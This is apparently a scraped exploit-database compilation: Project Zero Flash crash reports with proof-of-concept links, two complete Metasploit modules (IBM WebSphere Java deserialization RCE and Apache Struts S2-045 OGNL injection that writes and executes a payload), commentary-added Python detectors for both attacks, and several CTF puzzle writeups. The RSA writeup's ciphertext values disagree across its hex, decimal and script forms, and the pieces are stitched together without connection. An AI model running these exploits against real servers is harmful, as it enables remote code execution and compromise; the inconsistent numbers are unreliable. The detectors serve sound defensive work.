Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1015
The attached file causes an overflow in heap thumbnailing. To reproduce, place both attached files on a server and visit http://127.0.0.1/LoadImage.swf?img=thumb2.atf
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41610.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1016
The attached file causes heap corruption when decompressing a planar block. To reproduce the issue, put both attached files on a server and visit: http://127.0.0.1/LoadImage.swf?img=planar1.atf
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41611.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1017
There is a heap overflow in AVC header slicing. To reproduce the issue, put the attached files on a server and visit http://127.0.0.1/LoadImage.swf?img=slice.flv
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41612.zip
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Powershell

  def initialize(info={})
    super(update_info(info,
      'Name'           => "IBM WebSphere RCE Java Deserialization Vulnerability",
      'Description'    => %q{
        This module exploits a vulnerability in IBM's WebSphere Application Server. An unsafe deserialization
        call of unauthenticated Java objects exists to the Apache Commons Collections (ACC) library, which allows
        remote arbitrary code execution. Authentication is not required in order to exploit this vulnerability.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Liatsis Fotios @liatsisfotios' # Metasploit Module
          # Thanks for helping me:
          # # # # # # # # # # # #
          # Kyprianos Vasilopoulos @kavasilo # Implemented and reviewed - Metasploit module
          # Dimitriadis Alexios @AlxDm_ # Assistance and code check
          # Kotsiopoulos Panagiotis # Guidance about Size and Buffer implementation
        ],
      'References'     =>
        [
          ['CVE', '2015-7450'],
          ['URL', 'https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/CommonsCollections1.java'],
          ['URL', 'http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability'],
          ['URL', 'https://www.tenable.com/plugins/index.php?view=single&id=87171']
        ],
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'IBM WebSphere 7.0.0.0', {} ]
        ],
      'DisclosureDate' => "Nov 6 2015",
      'DefaultTarget'  => 0,
      'DefaultOptions' => {
        'SSL'      => true,
        'WfsDelay' => 20
      }))

    register_options([
      OptString.new('TARGETURI', [true, 'The base IBM\'s WebSphere SOAP path', '/']),
      Opt::RPORT('8880')
    ], self.class)
  end

  def exploit
    # Decode - Generate - Set Payload / Send SOAP Request
    soap_request(set_payload)
  end

  def set_payload
    # CommonCollections1 Serialized Streams
    ccs_start = "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"
    ccs_end = "dAAEZXhlY3VxAH4AHgAAAAFxAH4AI3NxAH4AEXNyABFqYXZhLmxhbmcuSW50ZWdlchLioKT3gYc4AgABSQAFdmFsdWV4cgAQamF2YS5sYW5nLk51bWJlcoaslR0LlOCLAgAAeHAAAAABc3IAEWphdmEudXRpbC5IYXNoTWFwBQfawcMWYNEDAAJGAApsb2FkRmFjdG9ySQAJdGhyZXNob2xkeHA/QAAAAAAAEHcIAAAAEAAAAAB4eHZyABJqYXZhLmxhbmcuT3ZlcnJpZGUAAAAAAAAAAAAAAHhwcQB+ADo="

    # Generate Payload
    payload_exec = invoke_ccs(ccs_start) + gen_payload + invoke_ccs(ccs_end)
    payload_exec = Rex::Text.encode_base64(payload_exec)
  end

  def invoke_ccs(serialized_stream)
    # Decode Serialized Streams
    serialized_stream = Rex::Text.decode_base64(serialized_stream)
  end

  def gen_payload
    # Staging Native Payload
    exec_cmd = cmd_psh_payload(payload.encoded, payload_instance.arch.first)
    exec_cmd = exec_cmd.gsub("%COMSPEC% /b /c start /b /min ", "")

    # Size up RCE - Buffer
    cmd_lng = exec_cmd.length
    lng2str = "0" + cmd_lng.to_s(16)
    buff = [lng2str].pack("H*")
    rce_pld = buff + exec_cmd
  end

  def soap_request(inject_payload)
    # SOAP Request
    req = "<?xml version='1.0' encoding='UTF-8'?>" + "\r\n"
    req += "<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\">" + "\r\n"
    req += "<SOAP-ENV:Header xmlns:ns0=\"admin\" ns0:WASRemoteRuntimeVersion=\"7.0.0.0\" ns0:JMXMessageVersion=\"1.0.0\" ns0:SecurityEnabled=\"true\" ns0:JMXVersion=\"1.2.0\">" + "\r\n"
    req += "<LoginMethod>BasicAuth</LoginMethod>" + "\r\n"
    req += "</SOAP-ENV:Header>" + "\r\n"
    req += "<SOAP-ENV:Body>" + "\r\n"
    req += "<ns1:getAttribute xmlns:ns1=\"urn:AdminService\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">" + "\r\n"
    req += "<objectname xsi:type=\"ns1:javax.management.ObjectName\">" + inject_payload + "</objectname>" + "\r\n"
    req += "<attribute xsi:type=\"xsd:string\">ringBufferSize</attribute>" + "\r\n"
    req += "</ns1:getAttribute>" + "\r\n"
    req += "</SOAP-ENV:Body>" + "\r\n"
    req += "</SOAP-ENV:Envelope>" + "\r\n"

    uri = target_uri.path
    res = send_request_raw({
      'method'      => 'POST',
      'version'     => '1.1',
      'raw_headers' => "Content-Type: text/xml; charset=utf-8" + "\r\n" + "SOAPAction: \"urn:AdminService\"" + "\r\n",
      'uri'         => normalize_uri(uri),
      'data'        => req
    })
  end
end
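The module above works because the SOAP `<objectname>` element is deserialized as a Java object before any authentication happens. From the defender's side, the cheapest signal is the stream itself: every Java serialized object starts with the bytes AC ED 00 05, which become `rO0AB` when base64-encoded, and the Commons Collections gadget chains carry recognisable class names in clear. The following detector is an added example, not part of the Metasploit module or of WebSphere; the gadget class list and the SOAP bodies are constructed by me (the "malicious" body is only a magic header followed by class names, not a working chain).

```python
import base64
import re
from dataclasses import dataclass, field
from typing import Iterator, List, Tuple

# ObjectOutputStream header: STREAM_MAGIC (0xACED) followed by STREAM_VERSION (5).
JAVA_SERIAL_MAGIC = b"\xac\xed\x00\x05"
# Base64 of that header at alignment 0; a cheap pre-filter for encoded streams.
B64_MAGIC_PREFIX = b"rO0AB"

# Class names that have no business in an untrusted ObjectName parameter. The first
# two are the core of the ysoserial CommonsCollections1 chain referenced above.
SUSPICIOUS_CLASSES = (
    b"org.apache.commons.collections.functors.InvokerTransformer",
    b"org.apache.commons.collections.functors.ChainedTransformer",
    b"org.apache.commons.collections.map.LazyMap",
    b"sun.reflect.annotation.AnnotationInvocationHandler",
)

B64_TOKEN = re.compile(rb"[A-Za-z0-9+/]{16,}={0,2}")


@dataclass
class Finding:
    offset: int                 # byte offset of the stream (or its base64 token) in the body
    encoded: bool               # True when the stream was base64-encoded
    classes: List[str] = field(default_factory=list)


def serialized_streams(body: bytes) -> Iterator[Tuple[int, bool, bytes]]:
    """Yield every raw or base64-encoded Java serialized stream found in body."""
    for m in re.finditer(re.escape(JAVA_SERIAL_MAGIC), body):
        yield m.start(), False, body[m.start():]
    for m in B64_TOKEN.finditer(body):
        token = m.group(0)
        if not token.startswith(B64_MAGIC_PREFIX):
            continue
        try:
            raw = base64.b64decode(token + b"=" * (-len(token) % 4))
        except ValueError:
            continue
        if raw.startswith(JAVA_SERIAL_MAGIC):
            yield m.start(), True, raw


def scan_soap_body(body: bytes) -> List[Finding]:
    """Flag serialized Java objects in a SOAP body and name any known gadget classes."""
    findings = []
    for offset, encoded, raw in serialized_streams(body):
        hits = [c.decode() for c in SUSPICIOUS_CLASSES if c in raw]
        findings.append(Finding(offset, encoded, hits))
    return findings


# --- constructed samples: the shapes a detector sees, not real gadget chains ---
def _fake_stream() -> bytes:
    # Magic, then TC_OBJECT/TC_CLASSDESC-style bytes and class names as they appear
    # in a real stream; the rest of the object graph is deliberately absent.
    return (JAVA_SERIAL_MAGIC + b"sr\x00\x32"
            + b"sun.reflect.annotation.AnnotationInvocationHandler" + b"\x00" * 8
            + b"sr\x00\x3b" + b"org.apache.commons.collections.functors.InvokerTransformer")


MALICIOUS_BODY = (b"<SOAP-ENV:Body><ns1:getAttribute>"
                  b"<objectname xsi:type=\"ns1:javax.management.ObjectName\">"
                  + base64.b64encode(_fake_stream()) +
                  b"</objectname></ns1:getAttribute></SOAP-ENV:Body>")
BENIGN_BODY = (b"<SOAP-ENV:Body><ns1:getAttribute>"
               b"<objectname xsi:type=\"ns1:javax.management.ObjectName\">"
               b"WebSphere:name=JVM,type=JVM,node=Node01,process=server1"
               b"</objectname></ns1:getAttribute></SOAP-ENV:Body>")

if __name__ == "__main__":
    for f in scan_soap_body(MALICIOUS_BODY):
        print(f"offset={f.offset} base64={f.encoded} gadget classes={f.classes}")
```

The magic-byte check alone is enough to alert on traffic to the SOAP connector on port 8880; the class-name list only adds confidence and naming for the analyst. The real fix is on the server (the vendor patch for CVE-2015-7450 and a class allow-list at deserialization), since a detector cannot enumerate every gadget.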
1. JS code analysis (encoding conversion)
Writeup:
1. Open index.html. <script src='script-min.js'></script> is the first .js script loaded. The inline script declares var ic = false; (the default value of ic is false) and var fg = '';. The function getFlag() is what the button triggers:
var token = document.getElementById('sectoken').value; // read the text box value into token
ic = checkToken(token); // call checkToken(token) to check it and assign the result
fg = bm(token); // call bm(token) to obtain the flag, then showFlag()
var f = document.getElementById('flag');
t.innerText = !ic ? 'You got the flag below!' : 'Wrong!';
t.className = !ic ? 'rightflag' : 'wrongflag';
f.innerText = fg;
The body is <h1>flag in your hand</h1> <p>type in good flag.</p> <p>tips: the flag is in your hand.</p> with the button bound via onclick='getflag()'.
2. Clicking the button obviously triggers the getFlag function. ic is false by default and checkToken(token) is called, so the checkToken function is the key point.
3. Open the checkToken function and look at its contents. The flag may be a fake token.
4. However, after entering it the error is still shown, so only fg = bm(token) remains, and this code has a problem.
5. Search for ic directly; that is, ic must be faked on this side.
6. Set the breakpoint under the icon on the left, click the button, and it breaks successfully. The function parameter s is the variable we entered; it compares the length of s with that of a, then checks each character of s minus 3 against the values in a. If everything matches it returns true. So we only need to work backwards from a to the s that returns true. The solution code is:
a = [118, 104, 102, 120, 117, 108, 119, 124, 48, 123, 101, 120]
s = ''
for i in a:
    s += chr(i - 3)
print(s)
8. Enter Security-XBU in the token box.
9. Finally, get the flag: renibyd8fgg5hawvqm7tdq
2. Base64 encoding and keyboard password
Writeup:
1. After opening the file, get two hex strings: 636A56355279427363446C4A49454A7154534230526D6843 564445A31614342354E326C4B49466667A5742696969614530672
2. Convert the hexadecimal string to ASCII (http://www.ab126.com/goju/1711.html) and get: cjv5rybscdljiejqtsb0rmhcvdz1Acb5n2lkiffzwia0g
3. Base64-decode it and get: r5yg lp9i bjm tfhb t6uh y7ij qsz bhm
4. Notice there is a space after every few characters. Looking at a keyboard, this is a keyboard password: each group is the set of keys surrounding one key. For example, r5yg surrounds t and lp9i surrounds o. Find the key surrounded by each group to form the flag. (No prefix needs to be added.)
5. Get: r5yg-t, lp9i-o, bjm-n, tfhb-g, t6uh-y, y7ij-u, qsz-a, bhm-n
6. Finally, the flag: tongyuan
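The decoding step above is done by eye in the writeup. As an added example (my code, not part of the writeup), the same rule can be made mechanical: model the staggered QWERTY layout so that each key knows its physical neighbours, then for each group find the single key whose neighbours contain every character of the group. The neighbour model (each row shifted half a key right of the row above, so a key touches two keys above and two below) is my assumption; the sample groups are the ones recovered above.

```python
# QWERTY rows; each row sits half a key to the right of the row above it, so the key
# at (row, col) touches (row-1, col) and (row-1, col+1) above and (row+1, col-1),
# (row+1, col) below. Model assumed here, not taken from the writeup.
ROWS = ["1234567890", "qwertyuiop", "asdfghjkl", "zxcvbnm"]
POS = {ch: (r, c) for r, row in enumerate(ROWS) for c, ch in enumerate(row)}


def neighbours(key: str) -> set:
    """Keys physically adjacent to `key`: left/right, two above, two below."""
    r, c = POS[key]
    candidates = [(r, c - 1), (r, c + 1), (r - 1, c), (r - 1, c + 1), (r + 1, c - 1), (r + 1, c)]
    out = set()
    for rr, cc in candidates:
        if 0 <= rr < len(ROWS) and 0 <= cc < len(ROWS[rr]):
            out.add(ROWS[rr][cc])
    return out


def surrounded_key(group: str) -> str:
    """The single key whose neighbours include every character of `group`.

    Raises ValueError when no key or more than one key fits, so an ambiguous or
    mistyped group is reported instead of silently producing a wrong letter."""
    chars = set(group.lower())
    hits = [k for k in POS if chars <= neighbours(k) and k not in chars]
    if len(hits) != 1:
        raise ValueError(f"{group!r}: {len(hits)} candidate keys {sorted(hits)}")
    return hits[0]


def decode_keyboard_cipher(text: str) -> str:
    """Decode space-separated groups such as 'r5yg lp9i ...' into the surrounded keys."""
    return "".join(surrounded_key(g) for g in text.split())


# Constructed sample: the groups recovered in the writeup above.
SAMPLE = "r5yg lp9i bjm tfhb t6uh y7ij qsz bhm"

if __name__ == "__main__":
    print(decode_keyboard_cipher(SAMPLE))  # tongyuan
```

Because the check is "every group character is a neighbour of the candidate", a group may be a partial ring (three keys, as in `bjm`) and still resolve uniquely; a group that fits no key, or several, raises instead of guessing.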
3. Industrial traffic packet analysis
Writeup:
1. Open the traffic capture. There are ARP, UDP and SNA protocol packets, and a large amount of UDP traffic, as shown in the figure:
2. First analyze the UDP packets. Most UDP packets share the same length; looking at the lengths, one packet length appears only once.
3. Follow the UDP stream of that packet (length 12) and suspicious characters are found.
4. Extract the string 666C61677B37466F4D3253746B6865507A7D and convert it to the corresponding ASCII (http://WWW.AB126.com/goju/1711.html).
5.
IV. Capital letters in ordinary text
1. After downloading the attachment I found it was a large text. After observing the text carefully, I found many letters in it that had been deliberately capitalized.
2. Filter out the capitals:
cat f590c0f99c014b01a5ab8b611b46c57c.txt | grep -o '[A-Z]' | tr -d '\n'
Here grep -o prints only the matching part of each line, and tr -d deletes the specified characters.
3. The filtered characters: ZEROONEZEROZEROZERO... (a long run of ZERO and ONE).
4. Extract all the capital letters of the article to get a string made of ZERO and ONE. Replace ZERO with the digit 0 and ONE with the digit 1 to get the binary number it represents, then convert this number to a string.
010000100100100101010100100110100001101010100010010011110110110100000101010110010010010011010111110011 0001011011100101111111110000011011000011010010010010001011011100101111001101010011001001001101110011001101111101
5. Online binary to string:
http://www.txttool.com/wenben_binarystr.asp
6. Python script:
# coding: utf-8
from string import ascii_uppercase
from Crypto.Util.number import long_to_bytes  # pycryptodome


def solve():
    # data.txt holds the capital letters filtered out above
    with open('data.txt', 'r') as f:
        data = f.read()
    cip = ''
    for c in data:
        if c in ascii_uppercase:
            cip += c
    # the capitals spell ZERO / ONE; turn them into a binary string
    cip = cip.replace('ZERO', '0')
    cip = cip.replace('ONE', '1')
    return long_to_bytes(int(cip, 2))


if __name__ == '__main__':
    print(solve())
7. Get the flag: bitsctf{h1d3_1n_pl41n_5173}
V. RSA decryption
Problem description: Fadi thought you were a newbie and was not afraid of you seeing what he posted. He sent the following to his friend in plain text: P=0xA6055EC186DE51800DDD6FCBF0192384FF42D707A55F57AF4FCFB0D1DC7BD9 7055E8275CD4B78EC63C5D592F567C66393A061324AA2E6A8D8FC2A910CBEE1ED9 Q=0xFA0F9463EA0A93B929C099320D31C277E0B0DBC65B189ED76124F5A1218F5D 91FD0102A4C8DE11F28BE5E4D0AE91AB319F4537E97ED74BC663E972A4A9119307 E=0x6D1FDAB4CE3217B3FC32C9ED480A31D067FD57D93A9AB52B472DC393AB785 2FBCB11ABBEBFD6AAAE8032DB1316DC22D3F7C3D631E24DF13EF23D3B381A1C3E 04ABCC745D402EE3A031AC2718FAE63B240837B4F657F29CA4702DA9AF22A3A01 9D68904A969DDB01BCF941DF70AF042F4FAE5CBEB9C2151B324F387E525094C41 C=0x7FE1A4F743675D1987D25D38111FAE0F78BBEA6852CBA5BEDA47DB76D119A3EFE24CB04B9449F53BECD43B0B46E269826A83F832832832BBB53555555555555555555555555555555555555555555555555555555555555555555553 8344ED5C20F51E2686D24C76050C1E73647523BD5F91D9B6AD3E86BBF912658 8B1DEE21E6997372E36C3E74284734748891829665086E0DC523ED23C386BB520 He seriously underestimated our decryption ability.
Writeup:
1. Convert the hexadecimal numbers in the question to decimal:
https://tool.lu/hexconvert/
P=86952241150363555850657119739296036271134788610181138168484331081777772517240308721981280176995392696427341397469232176120700610749965333026113898553049
Q=130967498239956280789309361619267313695508338010753995508616099990671457149850288846976369829603845838414249722038514443535111987497145134804975486079751
E=7662978138739724264311670987431757827144139255639280752983416867031015307352014386648673994217913815581782186636488159185965227449303118783362862435899486717504457233649829563176353949817149997732764355819103705595959463957043612059621114897322707756573946764130942694529006537681147498322988959999999989800641
C=8980138944356956995739840695470759849276392341856853603032354608827875836233104319736437910117697032594835902900582040394367480829800897231925233807452783893580314042780646333362614933672494585486504143906114941196250924762441948003604874406282213609341704339025169015256228029200222643343002882828063008
2. Use a script to get the RSA plaintext value M:
# coding=utf-8
import gmpy2
from Crypto.Util.number import *
from gmpy2 import iroot, invert

P = 86952241150363555850657119739296036271134788610181138168484331081777772517240308721981280176995392696427341397469232176120700610749965333026113898553049
Q = 130967498239956280789309361619267313695508338010753995508616099990671457149850288846976369829603845838414249722038514443535111987497145134804975486079751
E = 7662978138739724264311670987431757827144139255639280752983416867031015307352014386648673994217913815581782186636488159185965227449303118783362862435899486717504457233649829563176353949817149997732764355819103705595959463957043612059621114897322707756573946764130942694529006537681147498322988959999999989800641
c = 8980138944356956995739840695470759849276392341856853603032354608827875836233104311936363791011777777777777697032594835902900582040394367480829800897231925233807452783893580314042780646333313626149333333333333333333333333

# textbook RSA with p and q known: n = p*q, d = e^-1 mod phi(n), m = c^d mod n
n = P * Q
phi = (P - 1) * (Q - 1)
d = int(invert(E, phi))
m = pow(c, d, n)
print(long_to_bytes(m))
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Apache Struts Jakarta Multipart Parser OGNL Injection',
      'Description'    => %q{
        This module exploits a remote code execution vulnerability in Apache Struts
        version 2.3.5 - 2.3.31, and 2.5 - 2.5.10. Remote Code Execution can be performed
        via http Content-Type header.

        Native payloads will be converted to executables and dropped in the
        server's temp dir. If this fails, try a cmd/* payload, which won't
        have to write to the disk.
      },
      'Author'         => [
        'Nike.Zheng',     # PoC
        'Nixawk',         # Metasploit module
        'Chorder',        # Metasploit module
        'egypt',          # combining the above
        'Jeffrey Martin', # Java fu
      ],
      'References'     => [
        ['CVE', '2017-5638'],
        ['URL', 'https://cwiki.apache.org/confluence/display/WW/S2-045']
      ],
      'Privileged'     => true,
      'Targets'        => [
        [
          'Universal', {
            'Platform' => %w{ unix windows linux },
            'Arch'     => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],
          },
        ],
      ],
      'DisclosureDate' => 'Mar 07 2017',
      'DefaultTarget'  => 0))

    register_options(
      [
        Opt::RPORT(8080),
        OptString.new('TARGETURI', [ true, 'The path to a struts application action', '/struts2-showcase/' ]),
      ]
    )

    register_advanced_options(
      [
        OptString.new('HTTPMethod', [ true, 'The HTTP method to send in the request. Cannot contain spaces', 'GET' ])
      ]
    )

    @data_header = "X-#{rand_text_alpha(4)}"
  end

  def check
    var_a = rand_text_alpha_lower(4)

    ognl = ""
    ognl << %q|(#os=@java.lang.System@getProperty('os.name')).|
    ognl << %q|(#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('|+var_a+%q|', #os))|

    begin
      resp = send_struts_request(ognl)
    rescue Msf::Exploit::Failed
      return Exploit::CheckCode::Unknown
    end

    if resp && resp.code == 200 && resp.headers[var_a]
      vprint_good("Victim operating system: #{resp.headers[var_a]}")
      Exploit::CheckCode::Vulnerable
    else
      Exploit::CheckCode::Safe
    end
  end

  def exploit
    case payload.arch.first
    #when ARCH_JAVA
    #  datastore['LHOST'] = nil
    #  resp = send_payload(payload.encoded_jar)
    when ARCH_CMD
      resp = execute_command(payload.encoded)
    else
      resp = send_payload(generate_payload_exe)
    end

    require 'pp'
    pp resp.headers if resp
  end

  def send_struts_request(ognl, extra_header: '')
    uri = normalize_uri(datastore["TARGETURI"])

    content_type = "%{(#_='multipart/form-data')."
    content_type << "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
    content_type << "(#_memberAccess?"
    content_type << "(#_memberAccess=#dm):"
    content_type << "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
    content_type << "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
    content_type << "(#ognlUtil.getExcludedPackageNames().clear())."
    content_type << "(#ognlUtil.getExcludedClasses().clear())."
    content_type << "(#context.setMemberAccess(#dm))))."
    content_type << ognl
    content_type << "}"

    headers = { 'Content-Type' => content_type }
    if extra_header
      headers[@data_header] = extra_header
    end

    #puts content_type.gsub(").", ").\n")
    #puts

    resp = send_request_cgi(
      'uri'     => uri,
      'method'  => datastore['HTTPMethod'],
      'headers' => headers
    )

    if resp && resp.code == 404
      fail_with(Failure::BadConfig, 'Server returned HTTP 404, please double check TARGETURI')
    end
    resp
  end

  def execute_command(cmd)
    ognl = ''
    ognl << %Q|(#cmd=@org.apache.struts2.ServletActionContext@getRequest().getHeader('#{@data_header}')).|
    # You can add headers to the server's response for debugging with this:
    #ognl << %q|(#r=#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse']).|
    #ognl << %q|(#r.addHeader('decoded',#cmd)).|
    ognl << %q|(#os=@java.lang.System@getProperty('os.name')).|
    ognl << %q|(#cmds=(#os.toLowerCase().contains('win')?{'cmd.exe','/c',#cmd}:{'/bin/sh','-c',#cmd})).|
    ognl << %q|(#p=new java.lang.ProcessBuilder(#cmds)).|
    ognl << %q|(#p.redirectErrorStream(true)).|
    ognl << %q|(#process=#p.start())|

    send_struts_request(ognl, extra_header: cmd)
  end

  def send_payload(exe)
    ognl = ""
    ognl << %Q|(#data=@org.apache.struts2.ServletActionContext@getRequest().getHeader('#{@data_header}')).|
    ognl << %Q|(#f=@java.io.File@createTempFile('#{rand_text_alpha(4)}','.exe')).|
    #ognl << %q|(#r=#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse']).|
    #ognl << %q|(#r.addHeader('file',#f.getAbsolutePath())).|
    ognl << %q|(#f.setExecutable(true)).|
    ognl << %q|(#f.deleteOnExit()).|
    ognl << %q|(#fos=new java.io.FileOutputStream(#f)).|
    # Using stuff from the sun.* package here means it likely won't work on
    # non-Oracle JVMs, but the b64 decoder in Apache Commons doesn't seem to
    # work and I don't see a better way of getting binary data onto the
    # system. =/
    ognl << %q|(#d=new sun.misc.BASE64Decoder().decodeBuffer(#data)).|
    ognl << %q|(#fos.write(#d)).|
    ognl << %q|(#fos.close()).|
    ognl << %q|(#p=new java.lang.ProcessBuilder({#f.getAbsolutePath()})).|
    ognl << %q|(#p.start()).|
    ognl << %q|(#f.delete())|

    send_struts_request(ognl, extra_header: [exe].pack("m").delete("\n"))
  end
end
=begin
Doesn't work:
ognl << %q|(#cl=new java.net.URLClassLoader(new java.net.URL[]{#f.toURI().toURL()})).|
ognl << %q|(#c=#cl.loadClass('metasploit.Payload')).|
ognl << %q|(#m=@ognl.OgnlRuntime@getMethods(#c,'main',true).get(0)).|
ognl << %q|(#r.addHeader('meth',#m.toGenericString())).|
ognl << %q|(#m.invoke(null,null)).|
#ognl << %q|(#m=#c.getMethod('run',@java.lang.Class@forName('java.lang.Object'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@58ce5ef0
#ognl << %q|(#m=#c.getMethod('run',@java.lang.Class@forName('java.lang.String'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@58ce5ef0
#ognl << %q|(#m=#c.getMethod('run',@java.lang.Class@forName('[Ljava.lang.Object;'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@58ce5ef0
#ognl << %q|(#m=#c.getMethod('run',@java.lang.Class@forName('[Ljava.lang.String;'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@58ce5ef0
#ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{})).|
#ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{@java.lang.Class@forName('java.lang.Object')})).|
#ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{@java.lang.Class@forName('java.lang.String')})).|
#ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{@java.lang.Class@forName('java.lang.String')})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@16e2d926
#ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.Object;')})).|
#ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@684b3dfd
#ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{null})).|
#ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{@java.lang.Class@forName('java.lang.Object')})).|
#ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{@java.lang.Class@forName('java.lang.String')})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@16e2d926
#ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{@java.lang.Class@forName('[Ljava.lang.Object;')})).|
#ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{@java.lang.Class@forName('[Ljava.lang.String;')})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@684b3dfd
#ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@4b232ba9
#ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{null})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@4b232ba9
#ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{null})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@4fee2899
#ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[])).| # parse failed
#ognl << %q|(#m=#c.getMethod('run',null)).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@50af0cd6
#ognl << %q|(#m=#c.getMethod('main',@java.lang.Class@forName('java.lang.Object'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@58ce5ef0
#ognl << %q|(#m=#c.getMethod('main',@java.lang.Class@forName('java.lang.String'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@58ce5ef0
#ognl << %q|(#m=#c.getMethod('main',@java.lang.Class@forName('[Ljava.lang.Object;'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@58ce5ef0
#ognl << %q|(#m=#c.getMethod('main',@java.lang.Class@forName('[Ljava.lang.String;'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@2231d3a9
#ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{})).|
#ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('java.lang.Object')})).|
#ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('java.lang.String')})).|
#ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.Object;')})).|
#ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@684b3dfd
#ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{null})).|
#ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{@java.lang.Class@forName('java.lang.Object')})).|
#ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{@java.lang.Class@forName('java.lang.String')})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@16e2d926
#ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{@java.lang.Class@forName('[Ljava.lang.Object;')})).|
#ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{@java.lang.Class@forName('[Ljava.lang.String;')})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@16e2d926
#ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@5f78809f
#ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{null})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@4b232ba9
#ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{null})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@56c6add5
#ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[])).| # parse failed
#ognl << %q|(#m=#c.getMethod('main',null)).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@1722884
=end
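The module above puts the whole OGNL expression into the Content-Type header, which gives a defender an unusually clean detection point: a legitimate Content-Type never contains `%{` or `${`, and the S2-045 payload also carries Struts-specific markers (the `multipart/form-data` prefix, the `#_memberAccess` bypass, the xwork2 context lookup, the ProcessBuilder/Runtime/System calls). The detector below is an added example of mine, not part of the Metasploit module or of Struts; the indicator names and the three sample requests are constructed (the attack sample mirrors the module's `check` payload so that every indicator fires).

```python
import re
from typing import Dict, List

# Fragments of the S2-045 Content-Type payload as built in the module above.
# The indicator names are mine; the strings are what the traffic actually carries.
INDICATORS = {
    "ognl_expression": re.compile(r"%\{|\$\{"),
    "multipart_prefix": re.compile(r"\(#_\s*=\s*['\"]multipart/form-data['\"]\)"),
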